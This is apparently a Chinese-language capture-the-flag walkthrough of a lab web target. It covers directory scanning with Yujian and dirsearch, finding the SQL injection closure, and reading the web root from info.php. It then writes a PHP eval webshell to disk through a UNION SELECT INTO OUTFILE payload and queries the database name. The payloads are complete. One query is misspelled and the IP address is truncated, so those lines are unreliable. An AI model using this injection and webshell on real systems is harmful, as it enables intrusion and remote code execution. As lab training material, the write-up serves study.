1.使用御剑搜索位于与IP地址同一C段的靶机
2.扫描目标靶机目录下的文件
3.访问该文件
其中有两条提示的路径,分别访问,寻找注入点
m3diNf0
se3reTdir777/uploads/
se3reTdir777
4.在注入点尝试判断闭合方式
闭合方式:1
闭合方式:1'
闭合方式:1' #
判断出闭合方式为:1'#
5.使用dirsearch查看各个目录的详细内容
se3reTdir777/uploads/
dirsearch -u http://172.16.59/se3reTdir777/uploads/
se3reTdir777
dirsearch -u http://172.16.59/se3reTdir777
找到下级目录se3reTdir777/uploads/
m3diNf0
dirsearch -u http://172.16.59/m3diNf0
找到info.php文件
6.访问m3diNf0目录下的info.php文件
找到靶场的绝对路径
/home/www/html/web1x443290o2sdf92213
7.使用into outfile上传一句话木马
在搜索框输入以下内容:
1'union select 1,2,'<?php @eval($_POST[cmd]);?>' into outfile '/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/sisw.php'#
结果如下,上传成功
访问该文件,验证是否上传成功
8.使用联合注入查询,数据库名
1' union sekect 1, database() ,3 #
结果如图所示:
通关!!!!